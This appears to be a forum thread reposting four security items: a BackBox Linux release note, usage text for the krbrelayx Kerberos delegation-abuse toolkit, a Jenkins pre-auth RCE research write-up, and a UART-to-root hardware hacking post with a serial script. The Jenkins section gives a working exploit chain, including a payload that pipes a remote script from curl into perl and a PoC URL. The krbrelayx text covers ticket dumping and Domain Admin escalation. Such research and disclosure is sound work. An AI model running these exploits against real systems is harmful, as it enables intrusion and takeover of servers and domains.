The BackBox Team is pleased to announce the updated release of BackBox Linux, version 5.3. In this release we have fixed some minor bugs and updated the kernel stack, base system and hacking tools.

What's new
- Updated Linux Kernel 4.15
- Updated hacking tools
- Updated ISO Hybrid with UEFI support

System requirements
- 32-bit or 64-bit processor
- 1024 MB of system memory (RAM)
- 10 GB of disk space for installation
- Graphics card capable of 800×600 resolution
- DVD-ROM drive or USB port (3 GB)

The ISO images for both 32bit & 64bit can be downloaded from the official web site download section: https://www.backbox.org/download

Sursa: https://blog.backbox.org/2019/02/18/backbox-linux-5-3-released/
-
Krbrelayx - Unconstrained delegation abuse toolkit Toolkit for abusing unconstrained delegation. Requires impacket and ldap3 to function. It is recommended to install impacket from git directly to have the latest version available. More info about this toolkit available in my blog https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ Tools included addspn.py This tool can add/remove/modify Service Principal Names on accounts in AD over LDAP. usage: addspn.py [-h] [-u USERNAME] [-p PASSWORD] [-t TARGET] -s SPN [-r] [-q] [-a] HOSTNAME Add an SPN to a user/computer account Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified -t TARGET, --target TARGET Computername or username to target (FQDN or COMPUTER$ name, if unspecified user with -u is target) -s SPN, --spn SPN servicePrincipalName to add (for example: http/host.domain.local or cifs/host.domain.local) -r, --remove Remove the SPN instead of add it -q, --query Show the current target SPNs instead of modifying anything -a, --additional Add the SPN via the msDS-AdditionalDnsHostName attribute dnstool.py Add/modify/delete Active Directory Integrated DNS records via LDAP. usage: dnstool.py [-h] [-u USERNAME] [-p PASSWORD] [--forest] [--zone ZONE] [--print-zones] [-r TARGETRECORD] [-a {add,modify,query,remove,ldapdelete}] [-t {A}] [-d RECORDDATA] [--allow-multiple] [--ttl TTL] HOSTNAME Query/modify DNS records for Active Directory integrated DNS via LDAP Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication. -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified --forest Search the ForestDnsZones instead of DomainDnsZones --zone ZONE Zone to search in (if different than the current domain) --print-zones Only query all zones on the DNS server, no other modifications are made Record options: -r TARGETRECORD, --record TARGETRECORD Record to target (FQDN) -a {add,modify,query,remove,ldapdelete}, --action {add,modify,query,remove,ldapdelete} Action to perform. Options: add (add a new record), modify (modify an existing record), query (show existing), remove (mark record for cleanup from DNS cache), delete (delete from LDAP). Default: query -t {A}, --type {A} Record type to add (Currently only A records supported) -d RECORDDATA, --data RECORDDATA Record data (IP address) --allow-multiple Allow multiple A records for the same name --ttl TTL TTL for record (default: 180) printerbug.py Simple tool to trigger SpoolService bug via RPC backconnect. Similar to dementor.py. Thanks to @agsolino for implementing these RPC calls. 
usage: printerbug.py [-h] [-target-file file] [-port [destination port]] [-hashes LMHASH:NTHASH] [-no-pass] target attackerhost positional arguments: target [[domain/]username[:password]@]<targetName or address> attackerhost hostname to connect to optional arguments: -h, --help show this help message and exit connection: -target-file file Use the targets in the specified file instead of the one on the command line (you must still specify something as target name) -port [destination port] Destination port to connect to SMB Server authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -no-pass don't ask for password (useful when proxying through ntlmrelayx) krbrelayx.py Given an account with unconstrained delegation privileges, dump Kerberos TGT's of users connecting to hosts similar to ntlmrelayx. usage: krbrelayx.py [-h] [-debug] [-t TARGET] [-tf TARGETSFILE] [-w] [-ip INTERFACE_IP] [-r SMBSERVER] [-l LOOTDIR] [-f {ccache,kirbi}] [-codec CODEC] [-no-smb2support] [-wh WPAD_HOST] [-wa WPAD_AUTH_NUM] [-6] [-p PASSWORD] [-hp HEXPASSWORD] [-s USERNAME] [-hashes LMHASH:NTHASH] [-aesKey hex key] [-dc-ip ip address] [-e FILE] [-c COMMAND] [--enum-local-admins] [--no-dump] [--no-da] [--no-acl] [--no-validate-privs] [--escalate-user ESCALATE_USER] Kerberos "relay" tool. Abuses accounts with unconstrained delegation to pwn things. Main options: -h, --help show this help message and exit -debug Turn DEBUG output ON -t TARGET, --target TARGET Target to attack, since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use. -tf TARGETSFILE File that contains targets by hostname or full URL, one per line -w Watch the target file for changes and update target list automatically (only valid with -tf) -ip INTERFACE_IP, --interface-ip INTERFACE_IP IP address of interface to bind SMB and HTTP servers -r SMBSERVER Redirect HTTP requests to a file:// path on SMBSERVER -l LOOTDIR, --lootdir LOOTDIR Loot directory in which gathered loot (TGTs or dumps) will be stored (default: current directory). -f {ccache,kirbi}, --format {ccache,kirbi} Format to store tickets in. Valid: ccache (Impacket) or kirbi (Mimikatz format) default: ccache -codec CODEC Sets encoding used (codec) from the target's output (default "ascii"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/2.4/lib/standard- encodings.html and then execute ntlmrelayx.py again with -codec and the corresponding codec -no-smb2support Disable SMB2 Support -wh WPAD_HOST, --wpad-host WPAD_HOST Enable serving a WPAD file for Proxy Authentication attack, setting the proxy host to the one supplied. -wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM Prompt for authentication N times for clients without MS16-077 installed before serving a WPAD file. -6, --ipv6 Listen on both IPv6 and IPv4 Kerberos Keys (of your account with unconstrained delegation): -p PASSWORD, --krbpass PASSWORD Account password -hp HEXPASSWORD, --krbhexpass HEXPASSWORD Hex-encoded password -s USERNAME, --krbsalt USERNAME Case sensitive (!) salt. Used to calculate Kerberos keys.Only required if specifying password instead of keys. -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits) -dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter SMB attack options: -e FILE File to execute on the target system. 
If not specified, hashes will be dumped (secretsdump.py must be in the same directory) -c COMMAND Command to execute on target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory). --enum-local-admins If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary) LDAP attack options: --no-dump Do not attempt to dump LDAP information --no-da Do not attempt to add a Domain Admin --no-acl Disable ACL attacks --no-validate-privs Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks --escalate-user ESCALATE_USER Escalate privileges of this user instead of creating a new one TODO: Specifying SMB as target is not yet complete, it's recommended to run in export mode and then use secretsdump with -k Conversion tool from/to ccache/kirbi SMB1 support in the SMB relay server Sursa: https://github.com/dirkjanm/krbrelayx
-
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!

This is also a cross-post blog from DEVCORE; this post is in English, and a Chinese version is also available!

---

Hello everyone! This is the Hacking Jenkins series part two! For those who have not read part one yet, you can check the following link to get some basics and see how vulnerable Jenkins' dynamic routing is!

Hacking Jenkins Part 1 - Play with Dynamic Routing

As the previous article said, in order to utilize the vulnerability, we want to find a code execution that can be chained with the ACL bypass vulnerability into a well-deserved pre-auth remote code execution! But, I failed. Due to the feature of dynamic routing, Jenkins checks the permission again before most dangerous invocations (such as the Script Console)! Although we could bypass the first ACL, we still couldn't do much.

After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing my notes, I found another exploitation way for a gadget that I had failed to exploit before! Therefore, part two is the story of that! This is also one of my favorite exploits and is really worth reading.

Vulnerability Analysis

First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally, the reason why people choose Jenkins is that Jenkins provides a powerful Pipeline feature, which makes writing scripts for software building, testing and delivering easier! You can think of Pipeline as a powerful language to manipulate Jenkins (in fact, Pipeline is a DSL built with Groovy).

In order to check whether the syntax of user-supplied scripts is correct or not, Jenkins provides an interface for developers! Just think about it: if you were the developer, how would you implement this syntax-error-checking function? You could write an AST (Abstract Syntax Tree) parser by yourself, but that's too tough. So the easiest way is to reuse existing functions and libraries! As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can deal with the Pipeline script without errors, the syntax must be correct! The code fragment here shows how Jenkins validates the Pipeline:

public JSON doCheckScriptCompile(@QueryParameter String value) {
    try {
        CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build();
        new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value);
    } catch (CompilationFailedException x) {
        return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray());
    }
    return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON();
    // Approval requirements are managed by regular stapler form validation (via doCheckScript)
}

Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just AST parsing. Without running the execute() method, no dangerous invocation will be executed! If you try to parse the following Groovy script, you get nothing:

this.class.classLoader.parseClass('''
print java.lang.Runtime.getRuntime().exec("id")
''');

From the view of developers, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation, so the permission check here is looser than usual! Without any execute() method, it's just an AST parser and must be safe!
This is what I thought the first time I saw this validation. However, while I was writing the technique blog post, Meta-Programming flashed into my mind!

What is Meta-Programming

Meta-Programming is a kind of programming concept! The idea of Meta-Programming is to provide an abstract layer for programmers to consider the program in a different way, and to make the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both a program processing itself and writing programs that operate on other programs (compilers, interpreters or preprocessors…) are Meta-Programming! The philosophy here is very profound and could even be a big subject in Programming Languages! If it is still hard to understand, you can just regard eval(...) as another kind of Meta-Programming, which lets you operate on the program on the fly. Although it's a little bit inaccurate, it's still a good metaphor for understanding!

In software engineering, there are also lots of techniques related to Meta-Programming. For example:

- C Macros
- C++ Templates
- Java Annotations
- Ruby (Ruby is a Meta-Programming friendly language; there are even books about that)
- DSLs (Domain Specific Languages, such as Sinatra and Gradle)

When we are talking about Meta-Programming, we classify it into (1) compile-time and (2) run-time Meta-Programming according to the scope. Today, we focus on compile-time Meta-Programming!

P.S. It's hard to explain Meta-Programming in a non-native language. If you are interested, here are some materials! Wiki, Ref1, Ref2
P.S. I am not a programming language master; if there is anything incorrect or inaccurate, please forgive me <(_ _)>

How to Exploit?

From the previous section we know Jenkins validates the Pipeline with parseClass(…), and we have learned that Meta-Programming can poke the parser at compile-time! Compiling (or parsing) is hard work with lots of tough corner cases and hidden features. So, the idea is: is there any side effect we can leverage? There are many simple cases which have proved that Meta-Programming can make a program vulnerable, such as macro expansion in C:

#define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
#define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a
#define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b
#define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c
#define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d
#define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e
__int128 x[]={f,f,f,f,f,f,f,f};

or the compiler resource bomb (making a 16GB ELF from just 18 bytes):

int main[-1u]={1};

or calculating Fibonacci numbers with the compiler:

template<int n>
struct fib {
    static const int value = fib<n-1>::value + fib<n-2>::value;
};
template<> struct fib<0> { static const int value = 0; };
template<> struct fib<1> { static const int value = 1; };

int main() {
    int a = fib<10>::value; // 55
    int b = fib<20>::value; // 6765
    int c = fib<40>::value; // 102334155
}

From the assembly language of the compiled binary, we can make sure the result is calculated at compile-time, not run-time!

$ g++ template.cpp -o template
$ objdump -M intel -d template
...
00000000000005fa <main>:
 5fa:   55                      push   rbp
 5fb:   48 89 e5                mov    rbp,rsp
 5fe:   c7 45 f4 37 00 00 00    mov    DWORD PTR [rbp-0xc],0x37
 605:   c7 45 f8 6d 1a 00 00    mov    DWORD PTR [rbp-0x8],0x1a6d
 60c:   c7 45 fc cb 7e 19 06    mov    DWORD PTR [rbp-0x4],0x6197ecb
 613:   b8 00 00 00 00          mov    eax,0x0
 618:   5d                      pop    rbp
 619:   c3                      ret
 61a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]
...

For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow!
First Attempt

Back to our exploitation: Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We started reading the official Groovy Meta-Programming manual to find some exploitation ways. In section 2.1.9, we found the @groovy.transform.ASTTest annotation. Here is its description:

@ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer "explore" the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformation gives access to the AST before the Bytecode is produced. @ASTTest can be placed on any annotable node and requires two parameters:

What! Perform assertions on the AST? Isn't that what we want? Let's write a simple proof-of-concept in a local environment first:

this.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
    assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
def x
''');

$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned

Cool, it works! However, while reproducing this on the remote Jenkins, it shows:

unable to resolve class org.jenkinsci.plugins.workflow.libs.Library

What the hell!!! What's wrong with that? With a little bit of digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipeline, Jenkins provides a feature that can import a customized library into the Pipeline! Jenkins will load this library before every executed Pipeline. As a result, the problem becomes the lack of the corresponding library in the classPath during compile-time. That's why the "unable to resolve class" error occurs!

How to fix this problem? It's simple! Just go to the Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! That fixes the problem, and then we can execute arbitrary code without any error! But this is not a good solution, because this plugin is installed along with Pipeline. It's lame to ask an administrator to remove the plugin just for code execution! We stopped digging into this and tried to find another way!

Second Attempt

We continued reading the Groovy Meta-Programming manual and found another interesting annotation - @Grab. There is no detailed information about @Grab in the manual. However, we found another article - Dependency management with Grape - via a search engine! From that article we learned that Grape is a built-in JAR dependency management system in Groovy! It can help programmers import libraries which are not in the classPath. The usage looks like:

@Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE')
import org.springframework.jdbc.core.JdbcTemplate

By using the @Grab annotation, Groovy can automatically import a JAR file which is not in the classPath during compile-time! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that's enough. You can follow the PoC provided by @adamyordan to execute arbitrary commands! However, without a valid credential and an execute() method, this is just an AST parser and you can't even control files on the remote server. So, what can we do? By diving more into @Grab, we found another interesting annotation - @GrabResolver:

@GrabResolver(name='restlet', root='http://maven.restlet.org/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet

If you are smart enough, you would like to change the root parameter to a malicious website!
Let's try this in a local environment:

this.class.classLoader.parseClass('''
@GrabResolver(name='restlet', root='http://orange.tw/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
''')

11.22.33.44 - - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6-javadoc.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"

Wow, it works! Now, we believe we can make Jenkins import any malicious library via Grape! However, the next problem is: how do we get code execution?

The Way to Code Execution

In exploitation, the target is always escalating a read primitive or write primitive to code execution! From the previous section, we can write a malicious JAR file onto the remote Jenkins server via Grape. However, the next problem is how to execute code. By diving into the Grape implementation in Groovy, we realized the library fetching is done by the class groovy.grape.GrapeIvy! We started looking for anything we could leverage, and we noticed an interesting method, processOtherServices(…)!

void processOtherServices(ClassLoader loader, File f) {
    try {
        ZipFile zf = new ZipFile(f)
        ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
        if (serializedCategoryMethods != null) {
            processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods))
        }
        ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
        if (pluginRunners != null) {
            processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
        }
    } catch(ZipException ignore) {
        // ignore files we can't process, e.g. non-jar/zip artifacts
        // TODO log a warning
    }
}

A JAR file is just a subset of the ZIP format. In processOtherServices(…), Grape registers services if certain entry points are present. Among them, the Runner interests me. Looking into the implementation of processRunners(…), we find this:

void processRunners(InputStream is, String name, ClassLoader loader) {
    is.text.readLines().each {
        GroovySystem.RUNNER_REGISTRY[name] = loader.loadClass(it.trim()).newInstance()
    }
}

Here we see the newInstance(). Does that mean we can call the constructor of any class? Yes! So we can just create a malicious JAR file, put the class name into the file META-INF/services/org.codehaus.groovy.plugins.Runners, and we can invoke the constructor and execute arbitrary code!

Here is the full exploit:

public class Orange {
    public Orange(){
        try {
            String payload = "curl orange.tw/bc.pl | perl -";
            String[] cmds = {"/bin/bash", "-c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}

$ javac Orange.java
$ mkdir -p META-INF/services/
$ echo Orange > META-INF/services/org.codehaus.groovy.plugins.Runners
$ find .
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
$ jar cvf poc-1.jar ./Orange.class /META-INF/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[your_host]/tw/orange/poc/1/poc-1.jar
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2019 11:10:55 GMT
...

PoC:

http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;

Video:
We use Meta-Programming to import malicious JAR file during compile-time, and executing arbitrary code by the Runner service! Although there is a built-in Groovy Sandbox(Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is in compile-time, not in run-time! Because this is an attack vector on Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s thought which there is no execution so there is no problem. It is also an attack vector that requires the knowledge about computer science. Otherwise, you cannot think of the Meta-Programming! That’s what makes this vulnerability interesting. Aside from entry points doCheckScriptCompile(...) and toJson(...) I reported, after the vulnerability has been fixed, Mikhail Egorov also found another entry point quickly to trigger this vulnerability! Apart from that, this vulnerability can also be chained with my previous exploit on Hacking Jenkins Part 1 to bypass the Overall/Read restriction to a well-deserved pre-auth remote code execution. If you fully understand the article, you know how to chain Thank you for reading this article and hope you like it! Here is the end of Hacking Jenkins series, I will publish more interesting researches in the future Sursa: https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
-
UART-to-Root: The (Slightly) Harder Way
Posted on 02/14/2019 by Mike

Quick Note: This post assumes some knowledge of UART and U-boot, and touches slightly on eMMC dumping.

Many familiar with hardware hacking know that UART can be a quick and easy way to find yourself with a shell on a target device. Oftentimes, especially in older home routers and the like, you'll be automatically logged in as root or be able to log in with an easily-guessed or default password. In other circumstances, you may need to edit some boot arguments in the bootloader to trigger a shell (such as adding a 1 for single-user mode or adding init=/bin/sh). With this initial shell, you can dump and crack passwords or modify the firmware to grant access without the modified bootargs (change the password). Recently, I came head-to-head with a device that had a slightly more complicated boot process, with many environment variables setting other environment variables that eventually called a boot script from an eMMC that did more of the same.

Some Background

My target device was being driven by a cl-som-imx6; an off-the-shelf, bolt-on System on Module from Compulab. My target version of the cl-som-imx6 utilized a 16 gig eMMC for firmware storage that had two partitions: a FAT boot partition (in addition to U-boot on an EEPROM) and an EXT4 Linux filesystem.

cl-som-imx6 with eMMC removed

My first goal for this device was to get an active shell on the device while it was fully booted. Since I had multiple copies of my target device, I went for a quick win: I removed the eMMC and dumped its contents with the hope of recovering and cracking password hashes. While I was able to get the hashes from /etc/shadow, I was disappointed to see they were hashed with sha512crypt ($6$) and have so far been unable to crack them. Without valid credentials, my next goal was to modify boot args to bypass authentication and drop me directly into a root shell, with the hope of being able to change the password. The classic init=/bin/sh trick. It's important to note that when modifying the bootargs with init=/bin/sh, the device will not go through its standard boot process, therefore it will not kick off any scripts or applications that would normally fire on boot. So, while you may have a root shell, you will not be interacting with the device in its normal state. It is also temporary and will not persist after reboot.

The Problem

This is where it started getting a bit trickier. In my experience, U-boot usually has an environment variable called bootargs that passes necessary information to the kernel. In this case, there were several variables that set bootargs under different circumstances. I attempted to modify every instance where bootargs were getting set (to add init=/bin/sh) to no avail.
# binwalk part1.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
28672         0x7000          Linux kernel ARM boot executable zImage (little-endian)
34516         0x86D4          LZO compressed data
34884         0x8844          LZO compressed data
35489         0x8AA1          device tree image (dtb)
1322131       0x142C93        SHA256 hash constants, little endian
3218379       0x311BCB        mcrypt 2.5 encrypted data, algorithm: "5o", keysize: 12292 bytes, mode: "A",
3982809       0x3CC5D9        device tree image (dtb)
4273569       0x4135A1        Unix path: /var/run/L
4932888       0x4B4518        xz compressed data
5359334       0x51C6E6        LZ4 compressed data, legacy
5513216       0x542000        uImage header, header size: 64 bytes, header CRC: 0x665C5745, created: 2018-09-26 16:36:26, image size: 2397 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0x9F621F80, OS: Linux, CPU: ARM, image type: Script file, compression type: none, image name: "boot script"
5517312       0x543000        device tree image (dtb)
...

During this time, I also discovered that there appeared to be some sort of watch-dog active that would completely reset the device after about 2 minutes of playing around in U-boot's menu options. As a note: I don't believe this was an intended "Security" function but rather an unintended effect caused by the rest of the device (attached to the cl-som-imx6) after it failed to fully boot after X time.

After an hour or so reading the UART output during boot and attempting to understand the logic flow of the environment variables, I discovered that U-boot was calling a boot script before it touched any of my edited boot args. Luckily for me, this boot script was being called from the eMMC's boot partition, which I had dumped previously. Binwalk quickly identified the boot script's location, but failed to extract it. Using the offset of the script as a starting point and the offset of the following signature as the end point, I used dd to extract the script. As luck would have it, the script was actually a script (plaintext) and not a binary.

# dd if=partition1.bin of=boot.script skip=5513216 count=4096 bs=1
4096+0 records in
4096+0 records out
4096 bytes (4.1 kB, 4.0 KiB) copied, 0.0173901 s, 236 kB/s

The script was exactly 80 lines and contained several if/else statements, but most importantly, it had only one line setting the bootargs. At this point, my theory was that the only environment variables that mattered were being set by this script. I needed to modify this script to add init=/bin/sh.

# cat boot.script
setenv loadaddr 0x10800000
setenv fdt_high 0xffffffff
setenv fdt_addr 0x15000000
setenv bootm_low 0x15000000
setenv kernel_file zImage
setenv vmalloc vmalloc=256M
setenv cma cma=384M
setenv dmfc dmfc=3
setenv console ttymxc3,115200
setenv env_addr 0x10500000
setenv env_file boot.env
setenv ext_env ext_env=empty
...
setenv setup_args 'setenv bootargs console=${console} root=${rootdev} rootfstype=ext4 rw rootwait ${ext}'
...

The next hurdle was that I didn't have a direct way of modifying the contents of the eMMC without removing it, and that's the easy part. Getting it back on the SOM would have been tougher work than I was willing to tackle at the time.

The Solution

Without a simple way to modify the boot script, I decided to try to manually copy and paste each line of the script into the U-boot menu shell and, if necessary, remove all other environment variables. I ran into two problems with this approach.
First, any line over 34 characters that I tried to paste got truncated to 34. This was likely just caused by the ft232h buffer or something else with the serial connection. Second, and more annoying, was the watch-dog reset. There was simply no way I was going to paste in 80 lines (especially as many would require multiple copy/pastes due to the 34 character limit).

Even after removing as much as possible

My only answer was to automate the process. I had previously been playing around with the idea of bruteforcing simple 4 digit security codes, so I already had the outline of a script ready. I modified the script to read lines from an input file and write them to the serial device, where any line over 32 characters (to be safe) would be chunked up. To ensure data was sent at the correct time, I made sure the script waited for the shell prompt to return before sending the next line, with an additional .5 second sleep for good measure. Also, since the script would take over my ft232h, I needed to make sure it stopped autoboot at the correct time to enter the U-Boot shell. This approach worked perfectly and I was dropped into a /bin/sh shell as root. I then took control of my ft232h again so I could interact manually. With a quick passwd, I changed the root password and rebooted. As the modified environment variables didn't persist through reboot, the device booted as normal and presented me with a login prompt. I entered my newly set password and I was in.

Serial and script output ending in shell

Changing password

I'd post a screenshot of the final successful login after full boot, but I'd have to redact so much stuff that it wouldn't make any sense.

As a note: So I could keep an eye on everything, I used a second ft232h to watch the target's TX pin, and since it echoed everything back, I could also see my script's input. Also, the watch-dog was still in effect since the device didn't boot as it should have, therefore I had to be quick on the passwd.

The Script

Below is the script exactly as I used it. With a touch of modification to the until1 and until2 vars, it should be usable for other targets.

#!/usr/bin/env python
# By Mike Kelly
# exfil.co
# @lixmk

import serial
import sys
import argparse
import re
from time import sleep

# Key words
until1 = "Hit any key to stop autoboot:"
until2 = "SOM-iMX6 #"

# Read from device until prompt identifier
# Not using resp in this, but you can
def read_until(until):
    resp = ""
    while until not in resp:
        resp += dev.read(1)
    return resp

def serialprint():
    # Get to U-Boot Shell
    read_until(until1)
    dev.write("\n")
    # Wait for U-Boot Prompt
    read_until(until2)
    sleep(.5)
    dev.write("\n")
    with open(infile) as f:
        lines = f.readlines()
    for line in lines:
        # Lines < 32
        if len(line) < 32:
            read_until(until2)
            sleep(.5)
            print "Short Line: "+line.rstrip("\n")
            dev.write(line)
        # Break up longer lines
        else:
            read_until(until2)
            sleep(.5)
            for chunk in re.findall('.{1,32}', line):
                print "Long Line: "+chunk.rstrip("\n")
                dev.write(chunk)
                sleep(.5)
            dev.write("\n")
    print ""
    print "Done... Got root?"
    exit()

if __name__ == '__main__':
    # Argument parsing
    parser = argparse.ArgumentParser(usage='./setenv.py -d /dev/ttyUSB0 -b 115200 -f infile.txt')
    parser.add_argument('-d', '--device', required=True, help='Serial Device path ie: /dev/ttyUSB0')
    parser.add_argument('-b', '--baud', required=True, type=int, help='Serial Baud rate')
    parser.add_argument('-f', '--infile', type=str, help="Input file")
    args = parser.parse_args()
    device = args.device
    baud = args.baud
    infile = args.infile
    # Configuring device
    dev = serial.Serial(device, baud, timeout=5)
    # Executing
    serialprint()

Sursa: https://exfil.co/2019/02/14/uart-to-root-the-harder-way/